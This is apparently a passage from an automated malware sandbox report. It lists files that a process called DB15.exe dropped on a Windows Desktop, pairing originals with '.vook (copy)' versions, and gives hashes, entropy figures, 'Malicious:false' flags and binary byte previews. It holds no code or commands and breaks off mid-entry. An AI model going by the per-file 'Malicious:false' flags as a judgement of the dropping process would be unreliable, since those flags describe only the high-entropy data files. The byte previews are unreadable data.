                                                                                                                                                                                                                                      Preview:NEBFQl}.M.vz....1.1..X...0....P;..8..[]Bc.17i[EVyJ.CY..T.....U..t.w...$&%........t'.F...f.P..05....@T..,..6.@.b[.I$.FL..N..QGA^..>..x..>.E.......ukn...y..@...y..[.....d..].J.L.Tx..]y..)..u..1x..J.)=..."J.....X..~.L.H*....... .kj...mX.4^kv=0C..6;.D...[.@.+`.k...Z}uz..7n...>qX.;i.R..'j....XXw..@.&..\..~.....o..*....O/..!.7w3......$.......R=5.%...-k...I...\..`.w...1.....?.....VD....E.$A.Q..)d...\..Y...fvK..(....Q.q..$.....H.........&.fx...'SU.....>..um...........L.1k..f...m.D&$]0.`..a`..0.....d......,&.m.&...GU......uXYM.6&o$........ZA:....9...uiZX.J.l@..Z.]w.-..p..Q...r.c...w..E^H.F'.s4.~o..=..}.....!u....c.....CR.....X=.|F.c.&c....5.H.f.R@.5g.lAY0U.....l.Y.........agm.E:M..b.....2.gx<.`.C..Mz.J.+."C.>.U..%<...\.R+Uu.6...Y...}$9@A...a.r....'.....Dn..LG4.(c..V.9....].>....X48...9....b.?...F.....$FSm.Y.M.=.....N........=.......;...,..&.}d.7;..........k. ..=...ToU..|...<.>-.X...l..5......0...rC.>.r...D....|..p...v..K....SO4|.#by.S........g ..L..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NEBFQQYWPS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.821678855416415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mXr9ksUTeESKjDKNuOkzJn4LdRVhwKngDv1vwHcBlQeCFd2iDbUQXEwiTkbD:mb91K/K0zJM3YtkcYxvlXEBiD
                                                                                                                                                                                                                                      MD5:834A4712C3A6EE274974A885B45A6043
                                                                                                                                                                                                                                      SHA1:102B44703C124C01507F55A994937EBB9B81BFF4
                                                                                                                                                                                                                                      SHA-256:09B936DF53FFEC985BD4F6F7BEB5F57A589CA892AC55E839045F3BD939EC37E9
                                                                                                                                                                                                                                      SHA-512:75C642EEF81D0DEE78B9B26E22DEA9BA774C956BF44F6E2CB8F19251F4239973C452812C7978FFF8D6A3669023B75C15FA22D5BFA2F7780FCC377E0EA6280684
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQl}.M.vz....1.1..X...0....P;..8..[]Bc.17i[EVyJ.CY..T.....U..t.w...$&%........t'.F...f.P..05....@T..,..6.@.b[.I$.FL..N..QGA^..>..x..>.E.......ukn...y..@...y..[.....d..].J.L.Tx..]y..)..u..1x..J.)=..."J.....X..~.L.H*....... .kj...mX.4^kv=0C..6;.D...[.@.+`.k...Z}uz..7n...>qX.;i.R..'j....XXw..@.&..\..~.....o..*....O/..!.7w3......$.......R=5.%...-k...I...\..`.w...1.....?.....VD....E.$A.Q..)d...\..Y...fvK..(....Q.q..$.....H.........&.fx...'SU.....>..um...........L.1k..f...m.D&$]0.`..a`..0.....d......,&.m.&...GU......uXYM.6&o$........ZA:....9...uiZX.J.l@..Z.]w.-..p..Q...r.c...w..E^H.F'.s4.~o..=..}.....!u....c.....CR.....X=.|F.c.&c....5.H.f.R@.5g.lAY0U.....l.Y.........agm.E:M..b.....2.gx<.`.C..Mz.J.+."C.>.U..%<...\.R+Uu.6...Y...}$9@A...a.r....'.....Dn..LG4.(c..V.9....].>....X48...9....b.?...F.....$FSm.Y.M.=.....N........=.......;...,..&.}d.7;..........k. ..=...ToU..|...<.>-.X...l..5......0...rC.>.r...D....|..p...v..K....SO4|.#by.S........g ..L..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NEBFQQYWPS.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844525310072106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:E59abPKW+MkBKlwnJnzvHPFtd8D7L15YzMLn5IQCSYWEAD69BNmIagAE51SiTkbD:qabCW+MkZnZjFtd8fWknOy7EAqBNmW1q
                                                                                                                                                                                                                                      MD5:17CA5C1C55E45F8DA98D66FF136B000E
                                                                                                                                                                                                                                      SHA1:3C178643D457E4C696D1DD4B3BD511528B42630B
                                                                                                                                                                                                                                      SHA-256:DDEB45D234CAA77E9912467610035FDFA128699DA6D8D3102683EAD19E8A2776
                                                                                                                                                                                                                                      SHA-512:EC2BCD93B6B9A76D1B85903D6D59B1C77FF2983B954617AA56E0141588B1B624644F666131BF47191EBF0E9A4EC5BA14FCEAB6E1C2DEADC06E69C273E3ACCE00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.l. .j....&.x'.&../.9"...X.&z!{6L...'..\.H.k...8z.......p....(...u..,C.&"...LT.4.....4..M...#vXq.{l..C......#...&%...j..,......|.QG[38.p.b..18....l i.HJ.7.z.#........C..qL.;..6..G.V..j...JO.*75?..sT.l..<..E......X....y..k'.;Il.3.....T/.".#...p.[...tn..q..=XlX.v.x..v........&."7./.K.O...w....O1a..~..O?.J..zFw...Sil[B.9|.[6J...=...n1..l..f.{......0J.L4......"....P:.....%z..%...422..B.t..K..u.O;q.Z...@..O%.....1..F..J./#....!..W.=@(....e............R._......c.....l.E).....M..s.. .:...AY<.[F.F=..H....o6.GV......s..(.)..g.......cC.}U/ar.71"....h..>P..w.....np.>.....I8P.)Xl..(.........aq._.B(x.2.........|.Hkv3.q..k....f.cf.m.R.....I.4V.n...!.t...V.9.........V.N.....?...g.^A.G.........jaZ..@.+.s..d..RC..1[..../"dH.J.d.....;.f.j'..mO\sA..P...m...P.|..Y.I.....+......[.g.%.;...t..4dKlW.z.?-jh/.j.#..}^78x.@T..:y..!...\.X.C...6'."9.91..X..r.4..._....O...+^.}M\....Wy..p....S.3T.6....a....I.......+..Ud7&7.Z.J_..#..#....).@E..O...D|.<.D.9.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NEBFQQYWPS.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844525310072106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:E59abPKW+MkBKlwnJnzvHPFtd8D7L15YzMLn5IQCSYWEAD69BNmIagAE51SiTkbD:qabCW+MkZnZjFtd8fWknOy7EAqBNmW1q
                                                                                                                                                                                                                                      MD5:17CA5C1C55E45F8DA98D66FF136B000E
                                                                                                                                                                                                                                      SHA1:3C178643D457E4C696D1DD4B3BD511528B42630B
                                                                                                                                                                                                                                      SHA-256:DDEB45D234CAA77E9912467610035FDFA128699DA6D8D3102683EAD19E8A2776
                                                                                                                                                                                                                                      SHA-512:EC2BCD93B6B9A76D1B85903D6D59B1C77FF2983B954617AA56E0141588B1B624644F666131BF47191EBF0E9A4EC5BA14FCEAB6E1C2DEADC06E69C273E3ACCE00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.l. .j....&.x'.&../.9"...X.&z!{6L...'..\.H.k...8z.......p....(...u..,C.&"...LT.4.....4..M...#vXq.{l..C......#...&%...j..,......|.QG[38.p.b..18....l i.HJ.7.z.#........C..qL.;..6..G.V..j...JO.*75?..sT.l..<..E......X....y..k'.;Il.3.....T/.".#...p.[...tn..q..=XlX.v.x..v........&."7./.K.O...w....O1a..~..O?.J..zFw...Sil[B.9|.[6J...=...n1..l..f.{......0J.L4......"....P:.....%z..%...422..B.t..K..u.O;q.Z...@..O%.....1..F..J./#....!..W.=@(....e............R._......c.....l.E).....M..s.. .:...AY<.[F.F=..H....o6.GV......s..(.)..g.......cC.}U/ar.71"....h..>P..w.....np.>.....I8P.)Xl..(.........aq._.B(x.2.........|.Hkv3.q..k....f.cf.m.R.....I.4V.n...!.t...V.9.........V.N.....?...g.^A.G.........jaZ..@.+.s..d..RC..1[..../"dH.J.d.....;.f.j'..mO\sA..P...m...P.|..Y.I.....+......[.g.%.;...t..4dKlW.z.?-jh/.j.#..}^78x.@T..:y..!...\.X.C...6'."9.91..X..r.4..._....O...+^.}M\....Wy..p....S.3T.6....a....I.......+..Ud7&7.Z.J_..#..#....).@E..O...D|.<.D.9.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851183766593108
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:oixmK+rN4lHnvQPOhkWo3wR2UC5uT68W5tTGGWt1wMiTkbD:oiuqBn4LAeoEGGWvoiD
                                                                                                                                                                                                                                      MD5:AC3085465848917E38315393755AAC1E
                                                                                                                                                                                                                                      SHA1:B37D1B846EFBFDB98B41A6EF6E2FAD991F702211
                                                                                                                                                                                                                                      SHA-256:2EDD00E2B3189CB1F8A8DD7AED233E297E07AB67236C55BDB7D6CF825A2FBA50
                                                                                                                                                                                                                                      SHA-512:819FE89329DB1A3573C32A3FE1CF1A18687E130CFEACAAB41985D0B0E7CA1298D3FACDEDEF47E442851ADC12EC5EFB8E63B3B8FAF4EE44AB519EEFB6FF6C7600
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ..O..qC....As..+.]N.^...T.*.C..v....+*..Y<u...*E.....*...wF.l..V..Q.@ z...:=.b(..4V.......k..).'.hIa...|I...q....;..........U......T...^.........W.h... @)....!.....J................Fu".MY.?eM....Oo...Y.\.)..;.0l*..h^....n...*....N.v(..j.L$..n..6....J<f...9.M.y..+..dAZO.m....O$.T.0..=.v"^..y-..Vw9.Ll....e...B...R.9.... ?.].T..#..O.p5.\F...S...Z..r.m:.....v.....gXgk.2.f.......~j}.$RC`...6...D.........A...t{2..9.-X..D.[..?...:..3E.hG$d[.s.g..Kf..~X.Ef..u.J....P...,{.~+......d...[.I.RK..^9~....\=....H_.U.{.bQ).a,.._H.<3..~~CH.^_......n..|.L.(iU..j....b{.D...x...=.ZJ.....+..u..D.;.....X.\...8...m..O....+..?.=.2...]U......~.3c.H...o.6.JD..i.......8...4.=..ck.@9p.Mq.7....N/..gO...*.....Z..#..6....cT..d)..2.C...l.c..~.^...>.....}p".%.es..... |.qT...Q....X.9.8.B...(}9p....ZS.@.pwY....yL...c&.....&.[!.>d.e.vL..4...6b...l..M.tE.......'.#......ge..^...cE..%.FV..~/}.....1.;.8....O.|.'.)Q.<.Z..hC.9....-...B.?Dgs....z.f..-<[....~6.eF.*...>lj$..]Y

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NEBFQQYWPS.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851183766593108
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:oixmK+rN4lHnvQPOhkWo3wR2UC5uT68W5tTGGWt1wMiTkbD:oiuqBn4LAeoEGGWvoiD
                                                                                                                                                                                                                                      MD5:AC3085465848917E38315393755AAC1E
                                                                                                                                                                                                                                      SHA1:B37D1B846EFBFDB98B41A6EF6E2FAD991F702211
                                                                                                                                                                                                                                      SHA-256:2EDD00E2B3189CB1F8A8DD7AED233E297E07AB67236C55BDB7D6CF825A2FBA50
                                                                                                                                                                                                                                      SHA-512:819FE89329DB1A3573C32A3FE1CF1A18687E130CFEACAAB41985D0B0E7CA1298D3FACDEDEF47E442851ADC12EC5EFB8E63B3B8FAF4EE44AB519EEFB6FF6C7600
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ..O..qC....As..+.]N.^...T.*.C..v....+*..Y<u...*E.....*...wF.l..V..Q.@ z...:=.b(..4V.......k..).'.hIa...|I...q....;..........U......T...^.........W.h... @)....!.....J................Fu".MY.?eM....Oo...Y.\.)..;.0l*..h^....n...*....N.v(..j.L$..n..6....J<f...9.M.y..+..dAZO.m....O$.T.0..=.v"^..y-..Vw9.Ll....e...B...R.9.... ?.].T..#..O.p5.\F...S...Z..r.m:.....v.....gXgk.2.f.......~j}.$RC`...6...D.........A...t{2..9.-X..D.[..?...:..3E.hG$d[.s.g..Kf..~X.Ef..u.J....P...,{.~+......d...[.I.RK..^9~....\=....H_.U.{.bQ).a,.._H.<3..~~CH.^_......n..|.L.(iU..j....b{.D...x...=.ZJ.....+..u..D.;.....X.\...8...m..O....+..?.=.2...]U......~.3c.H...o.6.JD..i.......8...4.=..ck.@9p.Mq.7....N/..gO...*.....Z..#..6....cT..d)..2.C...l.c..~.^...>.....}p".%.es..... |.qT...Q....X.9.8.B...(}9p....ZS.@.pwY....yL...c&.....&.[!.>d.e.vL..4...6b...l..M.tE.......'.#......ge..^...cE..%.FV..~/}.....1.;.8....O.|.'.)Q.<.Z..hC.9....-...B.?Dgs....z.f..-<[....~6.eF.*...>lj$..]Y

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836728580960649
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FbDN9jdEMvH9K/zYYq29Tv9EpSUnZL4CWKomHNkOhN6GberInEZrbdZJOBiTkbD:FbDNIMvH9K/sYqSTO18CWKCyNFbFngrw
                                                                                                                                                                                                                                      MD5:7E35B4533AA5EC339B9AB40E9A55D522
                                                                                                                                                                                                                                      SHA1:197A8BFC7B0AB6B666B86C5313A13246435B1176
                                                                                                                                                                                                                                      SHA-256:08EF9CEB1346194CA8F0B65064B2E172887782509BF621530444394A5491B34F
                                                                                                                                                                                                                                      SHA-512:74FAC42F56C847493686FCE9DFC5C17542332C51832456EE0E97A4923B796C829F77AC33BCBCAED87E0C87D9861027227E8BC482977AF7B255875AAB01A25EB4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.g....3.....B.H.R.N.j.....21....i....{D6V...O..{<..._..ST...6.I.E...`...S....._U<s...o.%.E....W..W..:.....l~.D>...4u......u)3...Re..&{..N..S..dh..^....dB.j-......Ec....C........L.1...[.6.%.p[...U.~.m".9,..&.~;.i...#.`.^6.C..4.{.....,.P.#.Q.V).......2...ZAO.\e.q.>=o...!^...........0.0fMBQ..xvOdy...O..g........._.HUU>7n..#.E6U...[....71|...IW{{G..=J.x;71\c.......!.^......'K..../|E.3^.0.E.T......E...ghJ-#L."b-.'9z..X...f."sU.R.I.K.p..8.6.Z..]..U.&..<!.Gq+c5.....).......w.K:d#9...y.Q.:..X.......Nz..`.....K.q..|... .Nj...d0.U...O...K.*.R.....Y....J......M...l.JO.9.?.%T..p....nx..D{d.z.B... ;..Ml.=z.=..........M.=..J.D.*O.3...4.kj..M....$H...o.&....2&~icB[.o...2=?..-?.7...U1.YZ,...Z.sn...../6wZ.\7>.-.[.G......N.;..8.Y,L..Yi.&....G.%..4.+C.V[.....X*..I..K..S2.E.......7.xN@4..|~.Rl...7..$...fi.O-3..g.\.d..c....<:\....}.Ki.z.l..._.g.e..G..#.v.....9W.p.4h.(..8;.8...#p..m.........8..F-.?.!.I8#.!*........F...a...t/.......Zu.....%.3DP..<4

                                                                                                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836728580960649
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FbDN9jdEMvH9K/zYYq29Tv9EpSUnZL4CWKomHNkOhN6GberInEZrbdZJOBiTkbD:FbDNIMvH9K/sYqSTO18CWKCyNFbFngrw
                                                                                                                                                                                                                                      MD5:7E35B4533AA5EC339B9AB40E9A55D522
                                                                                                                                                                                                                                      SHA1:197A8BFC7B0AB6B666B86C5313A13246435B1176
                                                                                                                                                                                                                                      SHA-256:08EF9CEB1346194CA8F0B65064B2E172887782509BF621530444394A5491B34F
                                                                                                                                                                                                                                      SHA-512:74FAC42F56C847493686FCE9DFC5C17542332C51832456EE0E97A4923B796C829F77AC33BCBCAED87E0C87D9861027227E8BC482977AF7B255875AAB01A25EB4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.g....3.....B.H.R.N.j.....21....i....{D6V...O..{<..._..ST...6.I.E...`...S....._U<s...o.%.E....W..W..:.....l~.D>...4u......u)3...Re..&{..N..S..dh..^....dB.j-......Ec....C........L.1...[.6.%.p[...U.~.m".9,..&.~;.i...#.`.^6.C..4.{.....,.P.#.Q.V).......2...ZAO.\e.q.>=o...!^...........0.0fMBQ..xvOdy...O..g........._.HUU>7n..#.E6U...[....71|...IW{{G..=J.x;71\c.......!.^......'K..../|E.3^.0.E.T......E...ghJ-#L."b-.'9z..X...f."sU.R.I.K.p..8.6.Z..]..U.&..<!.Gq+c5.....).......w.K:d#9...y.Q.:..X.......Nz..`.....K.q..|... .Nj...d0.U...O...K.*.R.....Y....J......M...l.JO.9.?.%T..p....nx..D{d.z.B... ;..Ml.=z.=..........M.=..J.D.*O.3...4.kj..M....$H...o.&....2&~icB[.o...2=?..-?.7...U1.YZ,...Z.sn...../6wZ.\7>.-.[.G......N.;..8.Y,L..Yi.&....G.%..4.+C.V[.....X*..I..K..S2.E.......7.xN@4..|~.Rl...7..$...fi.O-3..g.\.d..c....<:\....}.Ki.z.l..._.g.e..G..#.v.....9W.p.4h.(..8;.8...#p..m.........8..F-.?.!.I8#.!*........F...a...t/.......Zu.....%.3DP..<4

                                                                                                                                                                                                                                      C:\Users\user\Desktop\PWCCAWLGRE.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.858407638883506
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:sShXuf3fCGoRU+jq4yGlwSENQAtiohv95htPkhvWUvV6DUrsZ3iiTkbD:sEefCLmG2SuMo59F9UvV6DQsZHiD
                                                                                                                                                                                                                                      MD5:F15ACAE50E97ADBCA01B9129D5CCAF07
                                                                                                                                                                                                                                      SHA1:DF67E2BF0B449A8439F62FBF760545774BA1F87E
                                                                                                                                                                                                                                      SHA-256:E1F92DAEF6C6E49E6EC9AE012F7A2BAA182075131AB684FCBD9770C1714C633A
                                                                                                                                                                                                                                      SHA-512:0FF6C6D55BE7ED8C1D2244B49157BAD7D20F6D580C7DB0D956A56D100E633B57F9B0B1F45E2C6FE08421B7EB0EBEAF20C907B56EA87FAE390735C24E0282739B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCAnw.~..j.m.+.o.....d...a.3.P..A,.28N8J...0...s|/....Wj.F..f...L.7s.../51.66........y.+.'e...%...&..m7m.`..4...x.9..0.sY..|._.}.[..Cgs..i_..p._x.{....B..r...M.....Oo......[....V.5McS2HB..Ko=4z..M.Rr\....-.C9v.LH...F...)M.:W.X..M.....{3=.......q..I..pe.1..9 G...]..u.UV............&..6d....T.R.%...wD..(`.v..&i.u.*N..'.Ha?t=.Z.....J..X......l...0..07.g.C...."....z.dqA.S.FkPK..p5.%..s....".......7....2......V......!.A.3.Ph`U7......)....E...H*.......:...o.F.;.y.......]5._...S.1..\".w.u..W4a.X68.#....9....E\.J.q"R..!.Fq..I.Bh].+\.M.S.P...#...;j...4......l..(y...#..i. .A......B~c.&..B.N....n_..Z.6..i....wx@'...h..I%g.N....%....n..|{..~3.l_.SC`..O.. .DG'.....bR...N. .....h{.Y..;.~=D..~"$..L..*.;c.....a\...;$.......".q|...n..EL.._..P..A..&e..5.\....mt.9XkT....k....IY..g....kf..N..a&....s....mc...0...D.w.4.%\H&.:.........1.]].Z..v........E...6.T$=.e......!`$...+<.R:N...\.....F..s...}.'..W.j.[_x..J....>.e.Y9:.gd29$.du..Etv..!..............

                                                                                                                                                                                                                                      C:\Users\user\Desktop\PWCCAWLGRE.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.858407638883506
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:sShXuf3fCGoRU+jq4yGlwSENQAtiohv95htPkhvWUvV6DUrsZ3iiTkbD:sEefCLmG2SuMo59F9UvV6DQsZHiD
                                                                                                                                                                                                                                      MD5:F15ACAE50E97ADBCA01B9129D5CCAF07
                                                                                                                                                                                                                                      SHA1:DF67E2BF0B449A8439F62FBF760545774BA1F87E
                                                                                                                                                                                                                                      SHA-256:E1F92DAEF6C6E49E6EC9AE012F7A2BAA182075131AB684FCBD9770C1714C633A
                                                                                                                                                                                                                                      SHA-512:0FF6C6D55BE7ED8C1D2244B49157BAD7D20F6D580C7DB0D956A56D100E633B57F9B0B1F45E2C6FE08421B7EB0EBEAF20C907B56EA87FAE390735C24E0282739B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCAnw.~..j.m.+.o.....d...a.3.P..A,.28N8J...0...s|/....Wj.F..f...L.7s.../51.66........y.+.'e...%...&..m7m.`..4...x.9..0.sY..|._.}.[..Cgs..i_..p._x.{....B..r...M.....Oo......[....V.5McS2HB..Ko=4z..M.Rr\....-.C9v.LH...F...)M.:W.X..M.....{3=.......q..I..pe.1..9 G...]..u.UV............&..6d....T.R.%...wD..(`.v..&i.u.*N..'.Ha?t=.Z.....J..X......l...0..07.g.C...."....z.dqA.S.FkPK..p5.%..s....".......7....2......V......!.A.3.Ph`U7......)....E...H*.......:...o.F.;.y.......]5._...S.1..\".w.u..W4a.X68.#....9....E\.J.q"R..!.Fq..I.Bh].+\.M.S.P...#...;j...4......l..(y...#..i. .A......B~c.&..B.N....n_..Z.6..i....wx@'...h..I%g.N....%....n..|{..~3.l_.SC`..O.. .DG'.....bR...N. .....h{.Y..;.~=D..~"$..L..*.;c.....a\...;$.......".q|...n..EL.._..P..A..&e..5.\....mt.9XkT....k....IY..g....kf..N..a&....s....mc...0...D.w.4.%\H&.:.........1.]].Z..v........E...6.T$=.e......!`$...+<.R:N...\.....F..s...}.'..W.j.[_x..J....>.e.Y9:.gd29$.du..Etv..!..............

                                                                                                                                                                                                                                      C:\Users\user\Desktop\PWCCAWLGRE.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860188922829125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:oPL+4acwmtY5BpPetgizShlRS35EqQjacry8oar3yxnmBEBERDQkbp4VjiiTkbD:oPLfq5PPetgizSx8PcOSr8mGyREkbpO2
                                                                                                                                                                                                                                      MD5:1DF2BD01E184D95F40202EA203F38181
                                                                                                                                                                                                                                      SHA1:844B0C97516B446874BC8A36BC4914B0281DEDD4
                                                                                                                                                                                                                                      SHA-256:4B88CBD7CA649AC3ACAD2CE3A44B9A9AEB609695BDF6536AA55DD7F028EBD709
                                                                                                                                                                                                                                      SHA-512:50A47FF1EEAEF2FF75F15D929F6841C640E3EB813D20B44078BFC5C9BD9B0D9EB3533F21DF9117F15FD0E0585512DD9AC5B2AE5C6B12CA3878AEF4BD98C508BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA#...SOY.....'..T..%...X5..%0..U....{!..G...:h..d..u.W.......DK...^.=.B....u...x....N.....Mz.[tH..J..oG..!...i.5Ol....8.....zQ.c..+e........t.[\f."D....Jn.. ..w....l.A...t....t....I.s.....;.....Q..i..H.*.%...b.;wc....q..o...{.]...|.r.hQ[.4..Tac.{V.!%.(LG..A.....O..8..\.]R...|.T_.k.b...->.^...)..o..,...Z.N.%......w.....S..i....[..MEK........$..:.Ht.b...._.~.e.}9..Gx..X.*.3ZE@Y.M.<..2.%;...cq..8...;l........C.."{u..C.M..5.I...\.....B..G......D."....A..j..V$.<.06............b{..@...........v...9.3.f..^..q..x9......P..E....o.......)$@lM.%..(a.G-.b.>h.}.O..F.z.1X...[..W3...[.-.v.8........@.x(.'..n..>V.....H.....>.*Z.D.Ku..y..<.E.@9Y.YI.S.....O=._O...^.3.(..l..<.r.|.1....F.{.....w..I..L...T.v.2...?.oL.....<&.-.......*r`...f...o.`s....w..Jj...Z...x..o).N......r.....0...-..v2.*...3.Tt.e.V.$.vG.dSK.oQ...x...hP...S.g!8b..ON.{Aq...q.;0..+..A).9t.mp....L.e.._.....<bw^=.'......3....s.t..m..fdA...........1Y`.]e%..U.....1.U.g.....^..G..._.....

                                                                                                                                                                                                                                      C:\Users\user\Desktop\PWCCAWLGRE.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860188922829125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:oPL+4acwmtY5BpPetgizShlRS35EqQjacry8oar3yxnmBEBERDQkbp4VjiiTkbD:oPLfq5PPetgizSx8PcOSr8mGyREkbpO2
                                                                                                                                                                                                                                      MD5:1DF2BD01E184D95F40202EA203F38181
                                                                                                                                                                                                                                      SHA1:844B0C97516B446874BC8A36BC4914B0281DEDD4
                                                                                                                                                                                                                                      SHA-256:4B88CBD7CA649AC3ACAD2CE3A44B9A9AEB609695BDF6536AA55DD7F028EBD709
                                                                                                                                                                                                                                      SHA-512:50A47FF1EEAEF2FF75F15D929F6841C640E3EB813D20B44078BFC5C9BD9B0D9EB3533F21DF9117F15FD0E0585512DD9AC5B2AE5C6B12CA3878AEF4BD98C508BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA#...SOY.....'..T..%...X5..%0..U....{!..G...:h..d..u.W.......DK...^.=.B....u...x....N.....Mz.[tH..J..oG..!...i.5Ol....8.....zQ.c..+e........t.[\f."D....Jn.. ..w....l.A...t....t....I.s.....;.....Q..i..H.*.%...b.;wc....q..o...{.]...|.r.hQ[.4..Tac.{V.!%.(LG..A.....O..8..\.]R...|.T_.k.b...->.^...)..o..,...Z.N.%......w.....S..i....[..MEK........$..:.Ht.b...._.~.e.}9..Gx..X.*.3ZE@Y.M.<..2.%;...cq..8...;l........C.."{u..C.M..5.I...\.....B..G......D."....A..j..V$.<.06............b{..@...........v...9.3.f..^..q..x9......P..E....o.......)$@lM.%..(a.G-.b.>h.}.O..F.z.1X...[..W3...[.-.v.8........@.x(.'..n..>V.....H.....>.*Z.D.Ku..y..<.E.@9Y.YI.S.....O=._O...^.3.(..l..<.r.|.1....F.{.....w..I..L...T.v.2...?.oL.....<&.-.......*r`...f...o.`s....w..Jj...Z...x..o).N......r.....0...-..v2.*...3.Tt.e.V.$.vG.dSK.oQ...x...hP...S.g!8b..ON.{Aq...q.;0..+..A).9t.mp....L.e.._.....<bw^=.'......3....s.t..m..fdA...........1Y`.]e%..U.....1.U.g.....^..G..._.....

                                                                                                                                                                                                                                      C:\Users\user\Desktop\PWCCAWLGRE.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8311800868309005
                                                                                                                                                                                                                                      Encrypted:false
